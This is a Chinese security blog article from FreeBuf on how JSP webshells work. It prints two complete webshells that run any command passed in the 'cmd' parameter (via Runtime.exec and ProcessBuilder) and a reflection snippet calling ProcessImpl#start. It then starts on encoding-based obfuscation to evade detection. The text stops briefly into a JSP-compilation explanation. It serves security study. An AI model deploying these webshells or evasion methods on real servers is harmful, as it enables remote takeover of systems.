freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课
报告 专辑
行业服务
政 府
CNCERT CNNVD
会员体系(甲方) 会员体系(厂商) 产品名录 企业空间
知识大陆

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Jsp Webshell原理性探究的那些事
  • 关注
Jsp Webshell原理性探究的那些事
2023-11-16 22:50:40

webshell

original webshell

最普通的webshell

<%
    // original WebShell
    String cmd = request.getParameter("cmd");
    if (cmd != null) {
        Process process = Runtime.getRuntime().exec(cmd);
        InputStream inputStream = process.getInputStream();
        BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
        String res = null;
        while ((res = bufferedReader.readLine()) != null) {
            response.getWriter().write(res);
        }
    }
%>

直接是通过get传参之后, 通过使用Runtime.getRuntime().exec()执行命令

这种webshell很容易被检测,Runtime.getRuntime().exec()具有很强的shell特征

other command

Runtime.getRuntime被禁用,换用其他执行命令的方式进行制作shell,(虽然也很容易被查杀

ProcessBuilder

<%
    // original WebShell
    String cmd = request.getParameter("cmd");
    if (cmd != null) {
        // ProcessBuilder
        Process process = new ProcessBuilder(new String[]{cmd}).start();
        InputStream inputStream = process.getInputStream();
        BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
        String res = "";
        while ((res = bufferedReader.readLine()) != null) {
            response.getWriter().write(res);
        }
    }
%>

ProcessImpl

同样也可以通过反射执行ProcessImpl#start方法进行命令执行

// ProcessImpl#start()
            Class<?> aClass = Class.forName("java.lang.ProcessImpl");
            Method start = aClass.getDeclaredMethod("start", String[].class, Map.class, String.class, ProcessBuilder.Redirect[].class, boolean.class);
            start.setAccessible(true);
            Process process = (Process) start.invoke(null, new String[]{cmd}, null, ".", null, true);

上面是在windows环境下的执行,在Unix下的系统是使用的UNIXProcess类

类似的我们可以

  1. 构造UNIXProcess/ProcessImpl实例进行命令执行

  2. 或者更底层的通过Unsafe进行类实例的创建以及反射调用Native方法forkAndExec进行命令执行

混淆绕过

编码

最常见的混淆就是通过编码来进行webshell的隐藏

对于JSP的解析流程

在请求一个jsp页面时,如果是首次jsp页面的访问将会对jsp页面进行编译生成一个class文件,之后封装成一个JspServlet,通过调用他的service方法处理请求,特别的,如果不是首次访问jsp文件,如果没有更改将不会再次进行编译操作,直接使用之前的JspServlet进行调用

简单跟进一下Jsp的解析过程以及对编码的判断

JspServletWrapper#service方法中通过compile方法进入编译流程

image-20231103230616273.png

默认使用使用JDTCompiler这个编译器进行编译

# web安全
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录
webshell
  • original webshell
  • other command
  • 混淆绕过